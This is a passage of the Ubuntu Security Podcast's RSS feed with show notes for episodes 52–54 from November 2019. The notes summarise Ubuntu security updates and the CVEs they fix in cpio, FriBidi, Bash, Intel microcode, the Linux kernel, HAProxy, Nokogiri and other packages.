<li><a href="https://ubuntu.com/security/CVE-2019-2997">CVE-2019-2997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2993">CVE-2019-2993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2991">CVE-2019-2991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2982">CVE-2019-2982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2974">CVE-2019-2974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2969">CVE-2019-2969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2968">CVE-2019-2968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2967">CVE-2019-2967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2966">CVE-2019-2966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2963">CVE-2019-2963</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2960">CVE-2019-2960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2957">CVE-2019-2957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2950">CVE-2019-2950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2948">CVE-2019-2948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2946">CVE-2019-2946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2938">CVE-2019-2938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2924">CVE-2019-2924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2923">CVE-2019-2923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2922">CVE-2019-2922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2920">CVE-2019-2920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2914">CVE-2019-2914</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2911">CVE-2019-2911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2910">CVE-2019-2910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Multiple issues fixed in MySQL - updated to 8.0.18 in eoan, whilst in
xenial, bionic and disco - 5.7.28 - for more details see upstream notices
<ul>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-28.html">https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-28.html</a></li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-18.html">https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-18.html</a></li>
<li><a href="https://www.oracle.com/security-alerts/cpuoct2019.html">https://www.oracle.com/security-alerts/cpuoct2019.html</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4196-1-python-ecdsa-vulnerabilities-11-42">[<a href="https://usn.ubuntu.com/4196-1/">USN-4196-1</a>] python-ecdsa vulnerabilities [11:42]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14859">CVE-2019-14859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14853">CVE-2019-14853</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Issues in handling DER encoding of signatures - failed to verify proper
DER encoding but also might raise exceptions unexpectedly on valid input
so would cause a DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-how-to-get-into-infosec-12-18">Joe and Alex discuss how to get into infosec [12:18]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E054.mp3" length="35735459" type="audio/mpeg" /><itunes:duration>26:43</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 53
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-53/</link>
          <pubDate>Fri, 15 Nov 2019 18:21:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>6322701e1569fa8a2176f7ddc3de8a25fec67f74a5d8335395aeafbb7fcc7533c5dc12f28d8ceb3f51469422dcd5da29061f11aa99a33d597ccc55bc2a629fd5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 53</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at the details of the latest Intel hardware
  vulnerabilities, including security updates for the Linux kernel and Intel
  microcode, plus Bash, cpio, FriBidi and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at the details of the latest Intel hardware
  vulnerabilities, including security updates for the Linux kernel and Intel
  microcode, plus Bash, cpio, FriBidi and more.
  </itunes:summary>
        <description>  This week we look at the details of the latest Intel hardware
  vulnerabilities, including security updates for the Linux kernel and Intel
  microcode, plus Bash, cpio, FriBidi and more.
  </description>
        <googleplay:description>  This week we look at the details of the latest Intel hardware
  vulnerabilities, including security updates for the Linux kernel and Intel
  microcode, plus Bash, cpio, FriBidi and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at the details of the latest Intel hardware
vulnerabilities, including security updates for the Linux kernel and Intel
microcode, plus Bash, cpio, FriBidi and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-4176-1-gnu-cpio-vulnerability-01-00">[<a href="https://usn.ubuntu.com/4176-1/">USN-4176-1</a>] GNU cpio vulnerability [01:00]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14866">CVE-2019-14866</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>cpio wouldn&rsquo;t validate values written to headers of TAR archives - could
use cpio to create a TAR containing another TAR with a big size and will
use wrong context values (ie uses inner TAR values in header) - this
could allow a TAR to be created which has files with permissions not
owned by the original user - when extracted by cpio will overwrite target
files - whereas if using tar to extract will avoid this - fixed to check
and handle header values correctly</li>
</ul>
<h3 id="usn-4177-1-rygel-vulnerability-02-18">[<a href="https://usn.ubuntu.com/4177-1/">USN-4177-1</a>] Rygel vulnerability [02:18]</h3>
<ul>
<li>Affecting Eoan</li>
<li>Added Rygel in Eoan which is off by default but needed GNOME to handle
that - it would disable it dynamically - so if not running GNOME, rygel
would be running and sharing your stuff on the local network - fixed to
disable automatically on upgrade - and then can use the GNOME settings
front-end etc to re-enable if desired</li>
</ul>
<h3 id="usn-4178-1-webkitgtk-plus-vulnerabilities-03-34">[<a href="https://usn.ubuntu.com/4178-1/">USN-4178-1</a>] WebKitGTK+ vulnerabilities [03:34]</h3>
<ul>
<li>4 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8771">CVE-2019-8771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8769">CVE-2019-8769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8720">CVE-2019-8720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8625">CVE-2019-8625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4181-1-webkitgtk-plus-vulnerabilities-03-34">[<a href="https://usn.ubuntu.com/4181-1/">USN-4181-1</a>] WebKitGTK+ vulnerabilities [03:34]</h3>
<ul>
<li>2 CVEs addressed in Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8814">CVE-2019-8814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8812">CVE-2019-8812</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4179-1-fribidi-vulnerability-04-00">[<a href="https://usn.ubuntu.com/4179-1/">USN-4179-1</a>] FriBidi vulnerability [04:00]</h3>
<ul>
<li>1 CVEs addressed in Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18397">CVE-2019-18397</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Issue reported about unicode isolated handling in Qt - turns out affected
GTK applications as well - entirely different code with very similar
flaw - stack buffer overflow since didn&rsquo;t check bounds of a fixed array
used to store details on nested unicode isolate sections - simple fix to
just check bounds before trying to store next element</li>
</ul>
<h3 id="usn-4180-1-bash-vulnerability-05-38">[<a href="https://usn.ubuntu.com/4180-1/">USN-4180-1</a>] Bash vulnerability [05:38]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2012-6711">CVE-2012-6711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Recently announced vuln (heap-based buffer overflow) in bash affecting
old versions - so most releases unaffected except Precise - can trigger
by printing wide characters via echo -e</li>
</ul>
<h3 id="usn-4182-1-usn-4182-2-intel-microcode-update-06-12">[<a href="https://usn.ubuntu.com/4182-1/">USN-4182-1</a>, USN-4182-2] Intel Microcode update [06:12]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11139">CVE-2019-11139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Voltage modulation able to be performed by a local privileged user -
disabled via microcode</li>
<li>TSX Asynchronous Abort (TAA) -
<a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/TAA_MCEPSC_i915">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/TAA_MCEPSC_i915</a>
<ul>
<li>Another variant of MDS but only affects processsors with Transational
Synchronization Extensions (TSX)</li>
<li>MDS mitigations also can mitigate this - but needs microcode update -
associated kernel update too</li>
</ul>
</li>
</ul>
<h3 id="usn-4183-1--usn-dot-ubuntu-dot-com-4183-1--linux-kernel-vulnerabilities-07-58">[<a href="//usn.ubuntu.com/4183-1/">USN-4183-1</a>] Linux kernel vulnerabilities [07:58]</h3>
<ul>
<li>9 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16746">CVE-2019-16746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15793">CVE-2019-15793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15792">CVE-2019-15792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15791">CVE-2019-15791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>MCEPSC -   <a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/TAA_MCEPSC_i915">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/TAA_MCEPSC_i915</a>
<ul>
<li>trigger a MCE from a guest by changing page size in a particular way
within the guest -&gt; MCE on host kernel -&gt; DoS</li>
</ul>
</li>
<li>i915 graphics - userspace can modify PTE via writes to MMIO from blitter
command streamer or expose kernel memory - privesc</li>
<li>TAA</li>
<li>Various other issues:
<ul>
<li>Realtek wifi driver buffer overflow - able to be triggered OTA - crash
/ RCE</li>
<li>Buffer overflow in nl80211 config interface (local user) - crash / code exec</li>
<li>Jann Horn - shiftfs issues
<ul>
<li>UID/GID confusion when namespace of lower file-system is not
init_user_ns - DAC bypass</li>
<li>type confusion -&gt; buffer overflow</li>
<li>reference count underflow -&gt; UAF
<ul>
<li>local user crash / code exec</li>
</ul>
</li>
</ul>
</li>
<li>i915 graphics - userspace read on GT MMIO -&gt; hang -&gt; DoS (low power state)</li>
</ul>
</li>
</ul>
<h3 id="usn-4184-1-linux-kernel-vulnerabilities-11-09">[<a href="https://usn.ubuntu.com/4184-1/">USN-4184-1</a>] Linux kernel vulnerabilities [11:09]</h3>
<ul>
<li>14 CVEs addressed in Bionic (HWE), Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17056">CVE-2019-17056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17055">CVE-2019-17055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17054">CVE-2019-17054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17053">CVE-2019-17053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17052">CVE-2019-17052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15793">CVE-2019-15793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15792">CVE-2019-15792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15791">CVE-2019-15791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15098">CVE-2019-15098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See above plus
<ul>
<li>Various network based subsystems failed to enforce CAP_NET_RAW for raw
socket creation
<ul>
<li>AF_NFC, AF_ISDN, AF_APPLETALK, AF_IEEE802154 (low-rate wireless
network), AF_AX25</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4185-1--usn-dot-ubuntu-dot-com-4185-1--usn-4185-2-linux-kernel-vulnerabilities-12-06">[<a href="//usn.ubuntu.com/4185-1/">USN-4185-1</a>, <a href="https://usn.ubuntu.com/4185-2/">USN-4185-2</a>] Linux kernel vulnerabilities [12:06]</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (Azure), Xenial (HWE), Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17056">CVE-2019-17056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17055">CVE-2019-17055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17054">CVE-2019-17054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17053">CVE-2019-17053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17052">CVE-2019-17052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15098">CVE-2019-15098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>realtek wifi buffer overflow, AF_XXX CAP_NET_RAW, NULL pointer
dereference in Atheros USB Wifi Driver, Intel hardware issues (2xi915 +
TAA + MCEPSC)</li>
</ul>
<h3 id="usn-4186-1-usn-4186-2-linux-kernel-vulnerabilities-12-47">[<a href="https://usn.ubuntu.com/4186-1/">USN-4186-1</a>, <a href="https://usn.ubuntu.com/4186-2/">USN-4186-2</a>] Linux kernel vulnerabilities [12:47]</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (HWE), Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2215">CVE-2019-2215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17666">CVE-2019-17666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17056">CVE-2019-17056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17055">CVE-2019-17055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17054">CVE-2019-17054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17053">CVE-2019-17053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17052">CVE-2019-17052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16746">CVE-2019-16746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15098">CVE-2019-15098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Binder UAF -&gt; crash, DoS -&gt; code exec (CONFIG_DEBUG_LIST mitigates this -
looking to add this in future kernels like 20.04)</li>
<li>realtek wifi, CAP_NET_RAW, nl80211 config buffer overflow, Intel hardware
issues</li>
</ul>
<h3 id="usn-4187-1-linux-kernel-vulnerability-13-48">[<a href="https://usn.ubuntu.com/4187-1/">USN-4187-1</a>] Linux kernel vulnerability [13:48]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TAA</li>
</ul>
<h3 id="usn-4188-1-linux-kernel-vulnerability-13-48">[<a href="https://usn.ubuntu.com/4188-1/">USN-4188-1</a>] Linux kernel vulnerability [13:48]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TAA</li>
</ul>
<h3 id="lsn-0059-1-linux-kernel-vulnerability-14-05">[LSN-0059-1] Linux kernel vulnerability [14:05]</h3>
<ul>
<li>4 CVEs addressed in Xenial and Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11135">CVE-2019-11135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0155">CVE-2019-0155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0154">CVE-2019-0154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12207">CVE-2018-12207</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Intel hardware issues - CAN&rsquo;T BE LIVEPATCHED - need to update kernel and reboot</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="20-dot-04-roadmap-sprint-14-55">20.04 Roadmap Sprint [14:55]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E053.mp3" length="22159072" type="audio/mpeg" /><itunes:duration>17:03</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 52
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-52/</link>
          <pubDate>Fri, 08 Nov 2019 21:48:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>acc482d7fd9d6f693da4ad85290ddb6ce4e775ac3c5488f1118fe6541a94e2c405f3cb8481ebd9f9d92cf7056ac083cf1173c9e386c45b9efb922620986532be</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 52</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus
  some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss
  the release of 14.04 ESM for personal use under the Ubuntu Advantage
  program.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus
  some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss
  the release of 14.04 ESM for personal use under the Ubuntu Advantage
  program.
  </itunes:summary>
        <description>  This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus
  some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss
  the release of 14.04 ESM for personal use under the Ubuntu Advantage
  program.
  </description>
        <googleplay:description>  This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus
  some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss
  the release of 14.04 ESM for personal use under the Ubuntu Advantage
  program.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus
some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss
the release of 14.04 ESM for personal use under the Ubuntu Advantage
program.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>9 unique CVEs addressed</p>
<h3 id="usn-4171-2-apport-vulnerabilities-00-44">[<a href="https://usn.ubuntu.com/4171-2/">USN-4171-2</a>] Apport vulnerabilities [00:44]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15790">CVE-2019-15790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11485">CVE-2019-11485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11483">CVE-2019-11483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11482">CVE-2019-11482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11481">CVE-2019-11481</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-51/">Episode 51</a></li>
</ul>
<h3 id="usn-4172-1-usn-4172-2-file-vulnerability-00-58">[<a href="https://usn.ubuntu.com/4172-1/">USN-4172-1</a>, <a href="https://usn.ubuntu.com/4172-2/">USN-4172-2</a>] file vulnerability [00:58]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18218">CVE-2019-18218</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OSS-Fuzz using libFuzzer - heap based buffer overflow of up to 4 bytes in
the CDF parser when handing vector elements - Composite Document File -
used in MS Office prior to new zipped XML format - ie. the old .doc /
.xls etc</li>
</ul>
<h3 id="usn-4173-1-freetds-vulnerability-01-48">[<a href="https://usn.ubuntu.com/4173-1/">USN-4173-1</a>] FreeTDS vulnerability [01:48]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13508">CVE-2019-13508</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Felix Wilhelm for Google Security Team - if a server were to downgrade
the protocol to version 5 and send a UDT type to the client, would cause
a heap buffer overflow due to mismatch in size - fixed by forcing the
size to an appropriate value</li>
</ul>
<h3 id="usn-4170-2-usn-4170-3-whoopsie-regressions-02-22">[<a href="https://usn.ubuntu.com/4170-2/">USN-4170-2</a>, <a href="https://usn.ubuntu.com/4170-3/">USN-4170-3</a>] Whoopsie regressions [02:22]</h3>
<ul>
<li>Affecting Xenial, Bionic, Disco, Eoan</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-51/">Episode 51</a> - update caused crash on upload to server due to mismatch in
size and resulting partial uninitialized variable - fixed to intialize
but realised this could still potentially crash on big-endian
architectures so fixed properly by changing size to 32-bit to match
memcpy()</li>
</ul>
<h3 id="usn-4171-3-usn-4171-4-apport-regression-04-07">[<a href="https://usn.ubuntu.com/4171-3/">USN-4171-3</a>, <a href="https://usn.ubuntu.com/4171-4/">USN-4171-4</a>] Apport regression [04:07]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15790">CVE-2019-15790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11485">CVE-2019-11485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11483">CVE-2019-11483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11482">CVE-2019-11482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11481">CVE-2019-11481</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-51/">Episode 51</a> - regression due to missing change to python code to handle
new internal API - fixed by updating the API to be backwards compatible</li>
</ul>
<h3 id="usn-4174-1-haproxy-vulnerability-04-55">[<a href="https://usn.ubuntu.com/4174-1/">USN-4174-1</a>] HAproxy vulnerability [04:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18277">CVE-2019-18277</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP Request Smuggling attack
<ul>
<li><a href="https://nathandavison.com/blog/haproxy-http-request-smuggling">https://nathandavison.com/blog/haproxy-http-request-smuggling</a></li>
</ul>
</li>
<li>Wouldn&rsquo;t reject messages that specified transfer-encoding without
&ldquo;chunked&rdquo; value</li>
<li>Could be combined with http reuse for request smuggling - ie. the ability
to get an attacker controlled chunk appended to a legitimate request and
hence the response sent back to the attacker etc - fixed to reject if
transfer-encoding is used without also specifying &ldquo;chunked&rdquo;</li>
</ul>
<h3 id="usn-4175-1-nokogiri-vulnerability-06-36">[<a href="https://usn.ubuntu.com/4175-1/">USN-4175-1</a>] Nokogiri vulnerability [06:36]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5477">CVE-2019-5477</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Ruby based parser for HTML/XML/SAS etc with XPath &amp; CSS selector support
etc</li>
<li>Command-injection vulnerability - due to use of the Rexical gem - and
would need to have code which then calls the undocumented load_file
method within the CSS tokenizer with user supplied input for the
filename - due to use of eval()&hellip;</li>
</ul>
<h3 id="usn-4165-2-firefox-regressions-07-38">[<a href="https://usn.ubuntu.com/4165-2/">USN-4165-2</a>] Firefox regressions [07:38]</h3>
<ul>
<li>Affecting Xenial, Bionic, Disco, Eoan</li>
<li>Upstream Firefox 70.0.1 release to fix a regression in the 70.0 release
